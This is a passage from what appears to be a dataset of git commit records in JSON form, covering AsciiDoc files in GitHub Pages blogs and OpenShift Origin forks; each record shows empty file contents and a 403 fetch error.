2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c779490a09611dc100e10a94aa8faee42276b1b","subject":"Update 2017-03-19-ui-layouts-no-nativescript.adoc","message":"Update 2017-03-19-ui-layouts-no-nativescript.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-19-ui-layouts-no-nativescript.adoc","new_file":"_posts\/2017-03-19-ui-layouts-no-nativescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a963850ea75310f225afd795b8ef6599ce9df018","subject":"Update 2016-11-20-The-Importance-of-Research.adoc","message":"Update 2016-11-20-The-Importance-of-Research.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_file":"_posts\/2016-11-20-The-Importance-of-Research.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ab9386462f77a9dae2ddeb2a5ef3feb5a8fffb","subject":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","message":"Update 2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_file":"_posts\/2017-07-23-By-using-a-neural-style-playing-around-and-borrow-the-masterpiece-of-taste-ver2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2de9489ca7825769055753f74d10612ca1e1b790","subject":"Update 2017-12-17-Masonry-at-the-Speed-of-Light.adoc","message":"Update 2017-12-17-Masonry-at-the-Speed-of-Light.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-12-17-Masonry-at-the-Speed-of-Light.adoc","new_file":"_posts\/2017-12-17-Masonry-at-the-Speed-of-Light.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6634ae0ca2c57bc09c74394874ccebc4c224d615","subject":"Update CONTRIBUTING.adoc","message":"Update CONTRIBUTING.adoc\n\nAdd download step","repos":"HyunsooKim1112\/origin,smarterclayton\/origin,barrett-vegas-com\/origin,akram\/origin,codificat\/origin,wanghaoran1988\/origin,ravisantoshgudimetla\/origin,linzhaoming\/origin,mjisyang\/origin,linux-on-ibm-z\/origin,jwforres\/origin,childsb\/origin,liangxia\/origin,mfojtik\/origin,bowenha2\/origin,allevo\/origin,liggitt\/origin,tagoh\/origin,linux-on-ibm-z\/origin,jwhonce\/origin,thesteve0\/origin,mkumatag\/origin,stefwalter\/origin,tjcunliffe\/origin,ingvagabund\/origin,dcrisan\/origin,lixueclaire\/origin,ramr\/origin,zofuthan\/origin,sdodson\/origin,rrati\/origin,nak3\/origin,levivic\/origin,burmanm\/origin,maleck13\/origin,kargakis\/origin,lorenzogm\/openshift-origin,matthyx\/origin,kargakis\/origin,jdnieto\/origin,ocsbrandon\/origin,aveshagarwal\/origin,linearregression\/origin,Jandersolutions\/origin,danwinship\/origin,hingstarne\/origin,nak3\/origin,ocsbrandon\/origin,gashcrumb\/origin,ncdc\/origin,rhamilto\/origin,sdminonne\/origin,marsmensch\/atomic-enterprise,rootfs\/origin,marun\/origin,ravisantoshgudimetla\/origin,markllama\/atomic-enterprise,chmouel\/origin,wjiangjay\/origin,tiwillia\/origin,asiainfoLDP\/datafactory,romanbartl\/origin,tnguyen-rh\/origin,imcsk8\/origin,allevo\/origin,Tlacenka\/origin,smunilla\/origin,markllama\/atomic-enterprise,spinolacastro\/origin,tnozicka\/origin,imcsk8\/origin,jhammant\/origin,mingderwang\/origin,stevekuznetsov\/origin,tdawson\/origin,Tlacenka\/origin,spinolacastro\/origin,gruiz17\/origin,danmcp\/origin,aveshagarwal\/origin,myfear\/origin,Jandersoft\/origin,pgmcd\/origin,rajkotecha\/origin,childsb\/origin,sgallagher\/origin,dkorn\/origin,dcbw\/origin,rajatchopra\/origin,westmisfit\/origin,tnozicka\/origin,maleck13\/origin,adelton\/origin,zofuthan\/origin,sspeiche\/origin,spadgett\/origin,levivic\/origin,PI-Victor\/origin,markllama\/origin,projectatomic\/atomic-enterprise,tiwillia\/origin,pmorie\/origin,levivic\/origin,tnguyen-rh\/origin,maxamillion\/origin,bowenha2\/origin,jdnieto\/origin,adelton\/origin,pombredanne\/atomic-enterprise,coreydaley\/origin,Jandersoft\/origin,adelton\/origin,thesteve0\/origin,sallyom\/origin,domenicbove\/origin,gashcrumb\/origin,ncdc\/origin,jhammant\/origin,willmtemple\/origin,yepengxj\/df,pacoja84\/origin,janetkuo\/origin,bparees\/origin,xuant\/origin,grdryn\/origin,juanvallejo\/origin,miminar\/atomic-enterprise,enj\/origin,xuant\/origin,arilivigni\/origin,sg00dwin\/origin,simo5\/origin,samsong8610\/origin,ryanj\/origin,tracyrankin\/origin,stackdocker\/origin,chlunde\/origin,gabemontero\/origin,stefwalter\/origin,myfear\/origin,smarterclayton\/origin,jupierce\/origin,mrogers950\/origin,YannMoisan\/origin,xiuwang\/origin,quantiply-fork\/origin,pacoja84\/origin,dmage\/origin,seveillac\/origin,dobbymoodge\/origin,spinolacastro\/origin,nitintutlani\/origin,vongalpha\/origin,dustintownsend\/origin,wanghaoran1988\/origin,barrett-vegas-com\/origin,lixueclaire\/origin,rhcarvalho\/origin,sspeiche\/origin,tiwillia\/origin,luciddreamz\/origin,myfear\/origin,gruiz17\/origin,westmisfit\/origin,wyue-redhat\/origin,aweiteka\/origin,mahak\/origin,abutcher\/origin,craigmunro\/origin,wanghaoran1988\/atomic-enterprise,mdshuai\/origin,ryanj\/origin,joshuawilson\/origin,christian-posta\/origin,greyfairer\/openshift-origin,php-coder\/origin,y0no\/origin,projectatomic\/atomic-enterprise,ocsbrandon\/origin,christian-posta\/origin,lixueclaire\/origin,jsafrane\/origin,janetkuo\/origin,craigmunro\/origin,mjisyang\/origin,tnozicka\/origin,wjiangjay\/origin,PI-Victor\/origin,jhammant\/origin,mkumatag\/origin,yarko\/origin,stefwalter\/origin,pravisankar\/origin,wjiangjay\/origin,marsmensch\/atomic-enterprise,mkumatag\/origin,zofuthan\/origin,wjiangjay\/origin,pecameron\/origin,rusenask\/origin,rajkotecha\/origin,biyiklioglu\/origin,csrwng\/origin,ejemba\/origin,akram\/origin,nhr\/origin,bowenha2\/origin,mnagy\/origin,rootfs\/origin,dcbw\/origin,hferentschik\/origin,Jandersolutions\/origin,jprukner\/origin,goern\/origin,greyfairer\/openshift-origin,smarterclayton\/origin,quantiply-fork\/origin,Tlacenka\/origin,aweiteka\/origin,EricMountain-1A\/openshift-origin,pkdevbox\/origin,jprukner\/origin,sdminonne\/origin,ironcladlou\/origin,chmouel\/origin,yarko\/origin,dinhxuanvu\/origin,adietish\/origin,spohnan\/origin,zhaosijun\/origin,louyihua\/origin,derekwaynecarr\/origin,fabianofranz\/origin,senayar\/origin,gabemontero\/origin,pravisankar\/origin,jeffvance\/origin,liggitt\/origin,smunilla\/origin,goern\/origin,mahak\/origin,rhamilto\/origin,wanghaoran1988\/atomic-enterprise,abutcher\/origin,moolitayer\/origin,danmcp\/origin,yarko\/origin,rhuss\/origin,pweil-\/origin,danmcp\/origin,legionus\/origin,gruiz17\/origin,sg00dwin\/origin,mfisher-rht\/origin,jupierce\/origin,tjcunliffe\/origin,pkdevbox\/origin,wyue-redhat\/origin,fabianofranz\/origin,zhaosijun\/origin,pgmcd\/origin,dcbw\/origin,ashcrow\/origin,wanghaoran1988\/atomic-enterprise,christian-posta\/origin,mdshuai\/origin,jeffvance\/origin,php-coder\/origin,mfisher-rht\/origin,craigmunro\/origin,dcrisan\/origin,dinhxuanvu\/origin,linux-on-ibm-z\/origin,anpingli\/origin,luciddreamz\/origin,tjanez\/origin,zofuthan\/origin,y0no\/origin,spinolacastro\/origin,mnagy\/origin,rrati\/origin,dgoodwin\/origin,Tlacenka\/origin,barrett-vegas-com\/origin,php-coder\/origin,pravisankar\/origin,sferich888\/origin,yepengxj\/df,jwforres\/origin,tjanez\/origin,Jandersoft\/origin,ironcladlou\/origin,openshift\/origin,jhammant\/origin,mdshuai\/origin,rajatchopra\/origin,jprukner\/origin,dustintownsend\/origin,projectatomic\/atomic-enterprise,spohnan\/origin,levivic\/origin,oybed\/origin,dmage\/origin,zofuthan\/origin,vongalpha\/origin,markllama\/origin,maxamillion\/origin,elyscape\/origin,mfisher-rht\/origin,anpingli\/origin,tnguyen-rh\/origin,rootfs\/origin,nhr\/origin,ravisantoshgudimetla\/origin,xuant\/origin,domenicbove\/origin,miminar\/atomic-enterprise,seveillac\/origin,marun\/origin,moolitayer\/origin,adietish\/origin,barrett-vegas-com\/origin,dgoodwin\/origin,tiwillia\/origin,detiber\/origin,adietish\/origin,miminar\/origin,rhcarvalho\/origin,chlunde\/origin,eparis\/origin,jwhonce\/origin,linux-on-ibm-z\/origin,wyue-redhat\/origin,rajatchopra\/origin,arilivigni\/origin,jhadvig\/origin,jwhonce\/origin,samsong8610\/origin,YannMoisan\/origin,pweil-\/origin,romanbartl\/origin,rhuss\/origin,linzhaoming\/origin,swizzley\/origin,hingstarne\/origin,ingvagabund\/origin,ncdc\/origin,tdawson\/origin,dustintownsend\/origin,burmanm\/origin,elyscape\/origin,moolitayer\/origin,simo5\/origin,dcbw\/origin,EricMountain-1A\/openshift-origin,tjcunliffe\/origin,pravisankar\/origin,senayar\/origin,pkdevbox\/origin,simo5\/origin,benjaminapetersen\/origin,sspeiche\/origin,Miciah\/origin,juanvallejo\/origin,sseago\/origin,Nick-Harvey\/origin,danwinship\/origin,benjaminapetersen\/origin,robertol\/origin,swizzley\/origin,nhr\/origin,php-coder\/origin,php-coder\/origin,burmanm\/origin,EricMountain-1A\/openshift-origin,jhadvig\/origin,mingderwang\/origin,wyue-redhat\/origin,deads2k\/origin,myfear\/origin,ibotty\/origin,rafabene\/origin,derekwaynecarr\/origin,Jandersolutions\/origin,codificat\/origin,dkorn\/origin,miminar\/atomic-enterprise,jhadvig\/origin,pombredanne\/atomic-enterprise,grdryn\/origin,rrati\/origin,smunilla\/origin,jpeeler\/origin,sspeiche\/origin,kargakis\/origin,ramr\/origin,adietish\/origin,tjanez\/origin,seveillac\/origin,joshuawilson\/origin,janetkuo\/origin,Nick-Harvey\/origin,dkorn\/origin,pmorie\/origin,yarko\/origin,adietish\/origin,grdryn\/origin,dustintownsend\/origin,spohnan\/origin,danwinship\/origin,knobunc\/origin,mfojtik\/origin,levivic\/origin,Tlacenka\/origin,tnguyen-rh\/origin,HyunsooKim1112\/origin,ramr\/origin,fkirill\/origin,sdodson\/origin,grdryn\/origin,imcsk8\/origin,mrogers950\/origin,elyscape\/origin,biyiklioglu\/origin,dcrisan\/origin,romanbartl\/origin,ryanj\/origin,rusenask\/origin,deads2k\/origin,rrati\/origin,mrogers950\/origin,legionus\/origin,thesteve0\/origin,domenicbove\/origin,xuant\/origin,cgwalters\/origin,y0no\/origin,lixueclaire\/origin,jim-minter\/origin,markllama\/origin,wyue-redhat\/origin,eparis\/origin,sg00dwin\/origin,knobunc\/origin,rhamilto\/origin,biyiklioglu\/origin,linearregression\/origin,markllama\/atomic-enterprise,jeremyeder\/origin,biyiklioglu\/origin,imcsk8\/origin,rhamilto\/origin,mrogers950\/origin,maxamillion\/origin,thesteve0\/origin,fkirill\/origin,lorenzogm\/openshift-origin,Nick-Harvey\/origin,dinhxuanvu\/origin,linzhaoming\/origin,quantiply-fork\/origin,dobbymoodge\/origin,maleck13\/origin,pgmcd\/origin,childsb\/origin,sallyom\/origin,PI-Victor\/origin,westmisfit\/origin,detiber\/origin,PI-Victor\/origin,goern\/origin,rafabene\/origin,jeremyeder\/origin,dobbymoodge\/origin,imcsk8\/origin,linearregression\/origin,pweil-\/origin,ravisantoshgudimetla\/origin,dustintownsend\/origin,sallyom\/origin,spadgett\/origin,jwhonce\/origin,moolitayer\/origin,simo5\/origin,HyunsooKim1112\/origin,stefwalter\/origin,ryanj\/origin,jwforres\/origin,mfisher-rht\/origin,ashcrow\/origin,xiuwang\/origin,willmtemple\/origin,hferentschik\/origin,coreydaley\/origin,nhr\/origin,tagoh\/origin,derekwaynecarr\/origin,JacobTanenbaum\/origin,tnguyen-rh\/origin,bowenha2\/origin,kargakis\/origin,sjug\/origin,domenicbove\/origin,dgoodwin\/origin,levivic\/origin,ibotty\/origin,jdnieto\/origin,Tlacenka\/origin,rusenask\/origin,mfojtik\/origin,yepengxj\/df,juanvallejo\/origin,jwforres\/origin,markllama\/origin,mjisyang\/origin,pmorie\/origin,inlandsee\/origin,YannMoisan\/origin,wanghaoran1988\/atomic-enterprise,yarko\/origin,pkdevbox\/origin,wanghaoran1988\/origin,pacoja84\/origin,mingderwang\/origin,knobunc\/origin,gruiz17\/origin,dobbymoodge\/origin,stackdocker\/origin,pecameron\/origin,jhadvig\/origin,romanbartl\/origin,luciddreamz\/origin,wjiangjay\/origin,sgallagher\/origin,rajatchopra\/origin,marun\/origin,sg00dwin\/origin,vongalpha\/origin,detiber\/origin,rhuss\/origin,rajkotecha\/origin,cgwalters\/origin,ryanj\/origin,thesteve0\/origin,jupierce\/origin,nak3\/origin,gruiz17\/origin,swizzley\/origin,legionus\/origin,fkirill\/origin,craigmunro\/origin,mjisyang\/origin,jeremyeder\/origin,inlandsee\/origin,cgwalters\/origin,bparees\/origin,pombredanne\/atomic-enterprise,markllama\/atomic-enterprise,detiber\/origin,soltysh\/origin,juanvallejo\/origin,mdshuai\/origin,fabianofranz\/origin,chlunde\/origin,PI-Victor\/origin,mfisher-rht\/origin,senayar\/origin,codificat\/origin,StevenLudwig\/origin,legionus\/origin,rchicoli\/openshift-origin,aveshagarwal\/origin,EricMountain-1A\/openshift-origin,rajkotecha\/origin,benjaminapetersen\/origin,robertol\/origin,sseago\/origin,matthyx\/origin,Nick-Harvey\/origin,danwinship\/origin,gashcrumb\/origin,nitintutlani\/origin,dkorn\/origin,vongalpha\/origin,jhammant\/origin,westmisfit\/origin,seveillac\/origin,mnagy\/origin,tracyrankin\/origin,dgoodwin\/origin,asiainfoLDP\/datafactory,samsong8610\/origin,burmanm\/origin,liangxia\/origin,tracyrankin\/origin,raffaelespazzoli\/origin,pombredanne\/atomic-enterprise,hingstarne\/origin,jprukner\/origin,ibotty\/origin,spohnan\/origin,senayar\/origin,rusenask\/origin,spadgett\/origin,sseago\/origin,Miciah\/origin,cgwalters\/origin,wanghaoran1988\/atomic-enterprise,domenicbove\/origin,dustintownsend\/origin,marsmensch\/atomic-enterprise,rafabene\/origin,lorenzogm\/openshift-origin,lorenzogm\/openshift-origin,louyihua\/origin,tnozicka\/origin,miminar\/origin,jim-minter\/origin,rajkotecha\/origin,grdryn\/origin,senayar\/origin,gesrat-cisco\/origin,robertol\/origin,rhuss\/origin,enj\/origin,craigmunro\/origin,gesrat-cisco\/origin,ncdc\/origin,jdnieto\/origin,miminar\/atomic-enterprise,spadgett\/origin,rafabene\/origin,dmage\/origin,tdawson\/origin,greyfairer\/openshift-origin,ejemba\/origin,pombredanne\/atomic-enterprise,seveillac\/origin,janetkuo\/origin,oybed\/origin,fkirill\/origin,childsb\/origin,marsmensch\/atomic-enterprise,wanghaoran1988\/atomic-enterprise,xuant\/origin,tnozicka\/origin,JacobTanenbaum\/origin,dobbymoodge\/origin,JacobTanenbaum\/origin,hroyrh\/origin,YannMoisan\/origin,moolitayer\/origin,hroyrh\/origin,yarko\/origin,linux-on-ibm-z\/origin,swizzley\/origin,pombredanne\/atomic-enterprise,dmage\/origin,miminar\/origin,jpeeler\/origin,quantiply-fork\/origin,Jandersoft\/origin,rchicoli\/openshift-origin,matthyx\/origin,robertol\/origin,detiber\/origin,hferentschik\/origin,vongalpha\/origin,mnagy\/origin,mdshuai\/origin,dkorn\/origin,Jandersoft\/origin,marsmensch\/atomic-enterprise,mjisyang\/origin,aweiteka\/origin,oybed\/origin,pkdevbox\/origin,allevo\/origin,rchicoli\/openshift-origin,smarterclayton\/origin,nitintutlani\/origin,pravisankar\/origin,aweiteka\/origin,jsafrane\/origin,dcrisan\/origin,romanbartl\/origin,ingvagabund\/origin,gesrat-cisco\/origin,ocsbrandon\/origin,marsmensch\/atomic-enterprise,rafabene\/origin,stackdocker\/origin,tagoh\/origin,asiainfoLDP\/datafactory,tdawson\/origin,ashcrow\/origin,tjcunliffe\/origin,HyunsooKim1112\/origin,StevenLudwig\/origin,tjanez\/origin,raffaelespazzoli\/origin,EricMountain-1A\/openshift-origin,rootfs\/origin,tjcunliffe\/origin,pgmcd\/origin,luciddreamz\/origin,adelton\/origin,tjcunliffe\/origin,asiainfoLDP\/datafactory,benjaminapetersen\/origin,linux-on-ibm-z\/origin,grdryn\/origin,wyue-redhat\/origin,adietish\/origin,ejemba\/origin,rafabene\/origin,codificat\/origin,pmorie\/origin,liggitt\/origin,ejemba\/origin,hingstarne\/origin,mingderwang\/origin,joshuawilson\/origin,lorenzogm\/openshift-origin,ravisantoshgudimetla\/origin,domenicbove\/origin,openshift\/origin,zhaosijun\/origin,christian-posta\/origin,sferich888\/origin,gashcrumb\/origin,dinhxuanvu\/origin,biyiklioglu\/origin,ibotty\/origin,oybed\/origin,mahak\/origin,mdshuai\/origin,juanvallejo\/origin,aveshagarwal\/origin,inlandsee\/origin,burmanm\/origin,pgmcd\/origin,fabianofranz\/origin,myfear\/origin,StevenLudwig\/origin,liggitt\/origin,sdodson\/origin,lorenzogm\/openshift-origin,swizzley\/origin,ryanj\/origin,joshuawilson\/origin,hferentschik\/origin,projectatomic\/atomic-enterprise,allevo\/origin,mrunalp\/origin,jim-minter\/origin,spinolacastro\/origin,robertol\/origin,danwinship\/origin,gesrat-cisco\/origin,burmanm\/origin,benjaminapetersen\/origin,akram\/origin,maleck13\/origin,pmorie\/origin,rhcarvalho\/origin,openshift\/origin,sdodson\/origin,spohnan\/origin,willmtemple\/origin,chmouel\/origin,mrogers950\/origin,EricMountain-1A\/openshift-origin,joshuawilson\/origin,smarterclayton\/origin,abutcher\/origin,raffaelespazzoli\/origin,stackdocker\/origin,joshuawilson\/origin,sosiouxme\/origin,miminar\/atomic-enterprise,thrasher-redhat\/origin,miminar\/origin,jprukner\/origin,tagoh\/origin,gabemontero\/origin,greyfairer\/openshift-origin,biyiklioglu\/origin,louyihua\/origin,YannMoisan\/origin,Jandersolutions\/origin,vongalpha\/origin,xiuwang\/origin,ibotty\/origin,wanghaoran1988\/origin,ironcladlou\/origin,pecameron\/origin,samsong8610\/origin,myfear\/origin,dcrisan\/origin,jhadvig\/origin,mrunalp\/origin,liangxia\/origin,stefwalter\/origin,PI-Victor\/origin,csrwng\/origin,rhcarvalho\/origin,pacoja84\/origin,knobunc\/origin,robertol\/origin,Nick-Harvey\/origin,greyfairer\/openshift-origin,rrati\/origin,linearregression\/origin,arilivigni\/origin,thrasher-redhat\/origin,bowenha2\/origin,craigmunro\/origin,jwhonce\/origin,tjanez\/origin,swizzley\/origin,mrunalp\/origin,danwinship\/origin,childsb\/origin,kargakis\/origin,matthyx\/origin,quantiply-fork\/origin,Jandersoft\/origin,anpingli\/origin,php-coder\/origin,ocsbrandon\/origin,janetkuo\/origin,jpeeler\/origin,ocsbrandon\/origin,Jandersolutions\/origin,kargakis\/origin,elyscape\/origin,jeremyeder\/origin,tagoh\/origin,soltysh\/origin,linzhaoming\/origin,willmtemple\/origin,jeffvance\/origin,abutcher\/origin,legionus\/origin,jprukner\/origin,nitintutlani\/origin,aweiteka\/origin,moolitayer\/origin,zhaosijun\/origin,quantiply-fork\/origin,mnagy\/origin,spohnan\/origin,enj\/origin,rhuss\/origin,sosiouxme\/origin,jpeeler\/origin,ramr\/origin,allevo\/origin,liangxia\/origin,hroyrh\/origin,jwforres\/origin,marun\/origin,dobbymoodge\/origin,liggitt\/origin,gesrat-cisco\/origin,stefwalter\/origin,hferentschik\/origin,xuant\/origin,samsong8610\/origin,imcsk8\/origin,nhr\/origin,rajatchopra\/origin,goern\/origin,y0no\/origin,coreydaley\/origin,stackdocker\/origin,westmisfit\/origin,StevenLudwig\/origin,Nick-Harvey\/origin,jeffvance\/origin,oybed\/origin,rchicoli\/openshift-origin,luciddreamz\/origin,bparees\/origin,pacoja84\/origin,linzhaoming\/origin,luciddreamz\/origin,oybed\/origin,y0no\/origin,raffaelespazzoli\/origin,miminar\/origin,ejemba\/origin,childsb\/origin,sjug\/origin,Jandersolutions\/origin,rhcarvalho\/origin,senayar\/origin,adelton\/origin,dkorn\/origin,wanghaoran1988\/origin,jupierce\/origin,tnozicka\/origin,miminar\/atomic-enterprise,StevenLudwig\/origin,projectatomic\/atomic-enterprise,dinhxuanvu\/origin,markllama\/origin,dcrisan\/origin,HyunsooKim1112\/origin,sgallagher\/origin,hingstarne\/origin,HyunsooKim1112\/origin,liangxia\/origin,jeremyeder\/origin,smunilla\/origin,liangxia\/origin,pacoja84\/origin,nitintutlani\/origin,ibotty\/origin,elyscape\/origin,smunilla\/origin,benjaminapetersen\/origin,hferentschik\/origin,nitintutlani\/origin,liggitt\/origin,bowenha2\/origin,sseago\/origin,gesrat-cisco\/origin,eparis\/origin,arilivigni\/origin,samsong8610\/origin,stevekuznetsov\/origin,lixueclaire\/origin,fkirill\/origin,rootfs\/origin,abutcher\/origin,pgmcd\/origin,juanvallejo\/origin,thrasher-redhat\/origin,romanbartl\/origin,stevekuznetsov\/origin,pkdevbox\/origin,jdnieto\/origin,markllama\/atomic-enterprise,eparis\/origin,tagoh\/origin,ramr\/origin,seveillac\/origin,y0no\/origin,cgwalters\/origin,sdodson\/origin,mingderwang\/origin,chmouel\/origin,ashcrow\/origin,maxamillion\/origin,ashcrow\/origin,maxamillion\/origin,tjanez\/origin,hingstarne\/origin,mjisyang\/origin,sseago\/origin,rusenask\/origin,allevo\/origin,spadgett\/origin,markllama\/atomic-enterprise,thesteve0\/origin,sseago\/origin,spinolacastro\/origin,ejemba\/origin,jhadvig\/origin,mrogers950\/origin,yepengxj\/df,projectatomic\/atomic-enterprise,louyihua\/origin,sdodson\/origin,markllama\/origin,sjug\/origin,mingderwang\/origin,zofuthan\/origin,jwforres\/origin,sdminonne\/origin,sgallagher\/origin,asiainfoLDP\/datafactory,jwhonce\/origin,greyfairer\/openshift-origin,soltysh\/origin,janetkuo\/origin,gruiz17\/origin,jupierce\/origin,christian-posta\/origin,mnagy\/origin,asiainfoLDP\/datafactory,StevenLudwig\/origin,fkirill\/origin,ashcrow\/origin,dgoodwin\/origin,sosiouxme\/origin,miminar\/origin,thrasher-redhat\/origin,wjiangjay\/origin,jpeeler\/origin,mfisher-rht\/origin,stackdocker\/origin,rajatchopra\/origin,aveshagarwal\/origin,chlunde\/origin,simo5\/origin,stevekuznetsov\/origin,cgwalters\/origin,louyihua\/origin,Miciah\/origin,tnguyen-rh\/origin,rusenask\/origin,jsafrane\/origin,jdnieto\/origin,deads2k\/origin,csrwng\/origin,westmisfit\/origin,jhammant\/origin,dcbw\/origin,rajkotecha\/origin,rhuss\/origin,lixueclaire\/origin,YannMoisan\/origin,barrett-vegas-com\/origin,danmcp\/origin,sferich888\/origin,smunilla\/origin,rhamilto\/origin,inlandsee\/origin,matthyx\/origin,barrett-vegas-com\/origin,tracyrankin\/origin,aweiteka\/origin,christian-posta\/origin","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asiainfoLDP\/datafactory.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c532b6afe6e6f8c1423183b32aadeaac4210ebd","subject":"Simplify repo setups in Go workspace","message":"Simplify repo setups in Go workspace\n","repos":"wanghaoran1988\/origin,markllama\/origin,benjaminapetersen\/origin,cgwalters\/origin,jhadvig\/origin,mnagy\/origin,linux-on-ibm-z\/origin,gabemontero\/origin,eparis\/origin,wanghaoran1988\/origin,Jandersolutions\/origin,jhammant\/origin,domenicbove\/origin,aveshagarwal\/origin,ashcrow\/origin,spinolacastro\/origin,greyfairer\/openshift-origin,simo5\/origin,rchicoli\/openshift-origin,aweiteka\/origin,imcsk8\/origin,seveillac\/origin,maxamillion\/origin,barrett-vegas-com\/origin,wyue-redhat\/origin,tagoh\/origin,quantiply-fork\/origin,dmage\/origin,adelton\/origin,miminar\/atomic-enterprise,ashcrow\/origin,stefwalter\/origin,bowenha2\/origin,simo5\/origin,dcrisan\/origin,jwforres\/origin,Nick-Harvey\/origin,ravisantoshgudimetla\/origin,oybed\/origin,linzhaoming\/origin,mingderwang\/origin,oybed\/origin,legionus\/origin,lixueclaire\/origin,rajkotecha\/origin,chlunde\/origin,wjiangjay\/origin,ironcladlou\/origin,liggitt\/origin,csrwng\/origin,rhamilto\/origin,tnozicka\/origin,marsmensch\/atomic-enterprise,tagoh\/origin,vongalpha\/origin,goern\/origin,stefwalter\/origin,liggitt\/origin,burmanm\/origin,childsb\/origin,jsafrane\/origin,danmcp\/origin,domenicbove\/origin,allevo\/origin,luciddreamz\/origin,adelton\/origin,sg00dwin\/origin,jeremyeder\/origin,nhr\/origin,romanbartl\/origin,dcbw\/origin,samsong8610\/origin,ibotty\/origin,thrasher-redhat\/origin,openshift\/origin,rhuss\/origin,Jandersoft\/origin,tjanez\/origin,rajatchopra\/origin,spohnan\/origin,php-coder\/origin,thesteve0\/origin,bowenha2\/origin,adelton\/origin,zofuthan\/origin,quantiply-fork\/origin,zhaosijun\/origin,rootfs\/origin,sseago\/origin,pecameron\/origin,stefwalter\/origin,willmtemple\/origin,derekwaynecarr\/origin,romanbartl\/origin,jprukner\/origin,benjaminapetersen\/origin,PI-Victor\/origin,ravisantoshgudimetla\/origin,yarko\/origin,liangxia\/origin,asiainfoLDP\/datafactory,marun\/origin,maxamillion\/origin,tagoh\/origin,ingvagabund\/origin,pweil-\/origin,pmorie\/origin,marun\/origin,tnozicka\/origin,knobunc\/origin,swizzley\/origin,yepengxj\/df,eparis\/origin,joshuawilson\/origin,mnagy\/origin,deads2k\/origin,biyiklioglu\/origin,csrwng\/origin,tiwillia\/origin,mdshuai\/origin,pgmcd\/origin,rafabene\/origin,mdshuai\/origin,aweiteka\/origin,akram\/origin,ashcrow\/origin,thesteve0\/origin,craigmunro\/origin,mkumatag\/origin,barrett-vegas-com\/origin,seveillac\/origin,hingstarne\/origin,aweiteka\/origin,liangxia\/origin,janetkuo\/origin,fkirill\/origin,pombredanne\/atomic-enterprise,gashcrumb\/origin,ashcrow\/origin,rajkotecha\/origin,legionus\/origin,robertol\/origin,mjisyang\/origin,wanghaoran1988\/origin,nitintutlani\/origin,liggitt\/origin,raffaelespazzoli\/origin,levivic\/origin,Nick-Harvey\/origin,rajkotecha\/origin,jeffvance\/origin,gruiz17\/origin,mahak\/origin,sspeiche\/origin,jeffvance\/origin,rhamilto\/origin,westmisfit\/origin,danmcp\/origin,ingvagabund\/origin,derekwaynecarr\/origin,moolitayer\/origin,dcrisan\/origin,janetkuo\/origin,louyihua\/origin,seveillac\/origin,coreydaley\/origin,wjiangjay\/origin,mingderwang\/origin,StevenLudwig\/origin,PI-Victor\/origin,spadgett\/origin,projectatomic\/atomic-enterprise,detiber\/origin,jupierce\/origin,Jandersolutions\/origin,oybed\/origin,jhadvig\/origin,dinhxuanvu\/origin,grdryn\/origin,pmorie\/origin,php-coder\/origin,zofuthan\/origin,miminar\/origin,codificat\/origin,miminar\/origin,allevo\/origin,EricMountain-1A\/openshift-origin,biyiklioglu\/origin,jsafrane\/origin,StevenLudwig\/origin,spohnan\/origin,eparis\/origin,YannMoisan\/origin,sg00dwin\/origin,sseago\/origin,PI-Victor\/origin,ashcrow\/origin,rootfs\/origin,dkorn\/origin,nitintutlani\/origin,fkirill\/origin,jprukner\/origin,maxamillion\/origin,jpeeler\/origin,detiber\/origin,mjisyang\/origin,sjug\/origin,coreydaley\/origin,sdodson\/origin,danmcp\/origin,aweiteka\/origin,tjcunliffe\/origin,smunilla\/origin,dkorn\/origin,tjcunliffe\/origin,xuant\/origin,ocsbrandon\/origin,markllama\/origin,sspeiche\/origin,Jandersoft\/origin,sseago\/origin,zofuthan\/origin,dmage\/origin,linux-on-ibm-z